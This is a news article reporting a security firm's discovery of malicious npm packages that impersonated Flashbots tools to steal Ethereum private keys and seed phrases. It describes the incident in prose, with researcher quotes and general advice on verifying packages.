- Trending
- Comments
- Latest
A new wave of malicious npm packages has been uncovered, targeting Ethereum developers by disguising themselves as legitimate Flashbots tools. According to security firm Socket, these malicious npm packages were designed to exfiltrate private keys and mnemonic seed phrases, sending them directly to a Telegram bot controlled by the attackers.
The threat actors, operating under the username “flashbotts,” uploaded four malicious npm packages between September 2023 and August 19, 2025. The impersonation of Flashbots — a trusted project that mitigates Maximal Extractable Value (MEV) attacks — appears calculated to exploit developer trust in widely used cryptographic utilities.
“Malicious npm packages like these demonstrate how attackers are leveraging software supply chains to bypass security checks and directly target developers,” — Kush Pandya, Researcher, Socket, said in the published analysis.
The most dangerous of the malicious npm packages, identified as @flashbotts/ethers-provider-bundle, concealed its operations behind a functional cover that mimicked Flashbots’ API. The library covertly harvested environment variables using SMTP via Mailtrap and redirected unsigned Ethereum transactions to attacker-controlled wallets.
Other malicious npm packages in the set, including sdk-ethers and flashbot-sdk-eth, were programmed to extract mnemonic seed phrases and private keys under certain conditions. Another package, gram-utilz, enabled attackers to exfiltrate arbitrary data to their Telegram-controlled infrastructure.
By blending harmful code with legitimate utilities, the attackers successfully obscured their intent. This technique makes detection challenging for developers relying on npm’s vast ecosystem of open-source packages.
“By exploiting the Flashbots name, the attackers increased the likelihood of unsuspecting developers integrating malicious npm packages into their trading bots or wallet infrastructure,” — Pandya added.
Mnemonic seed phrases, often referred to as the “master keys” to crypto wallets, allow full access and recovery of funds. Once stolen through the npm packages, these phrases give attackers complete and irreversible control over a victim’s assets.
The attack highlights the growing risk of software supply chain vulnerabilities. Developers integrating malicious npm packages into decentralized finance (DeFi) tools or validator infrastructure could unintentionally expose sensitive wallet information, leading to immediate losses.
“Compromised private keys in a high-frequency trading environment can lead to catastrophic financial consequences within seconds,” — Michael Driscoll, Blockchain Security Analyst, SecureChain Labs, told The Block.
Investigators also found Vietnamese language comments in the source code, suggesting that the attackers may be Vietnamese-speaking and financially motivated.
The discovery of the npm packages underscores the urgent need for stronger safeguards in the open-source ecosystem. Security experts argue that greater emphasis should be placed on code auditing, package verification, and developer education.
“Malicious npm packages weaponize developer trust in familiar names, turning what should be routine development tasks into high-stakes security risks,” — Driscoll added.
Flashbots, while not directly implicated, is working with the broader Ethereum community to emphasize safe integration practices and to remind developers to verify package authenticity before adoption.
The findings serve as a reminder that malicious npm packages remain one of the most effective tools for attackers conducting software supply chain attacks. With Web3 development increasingly reliant on shared codebases, industry stakeholders warn that the risks will continue to grow without proactive defenses.
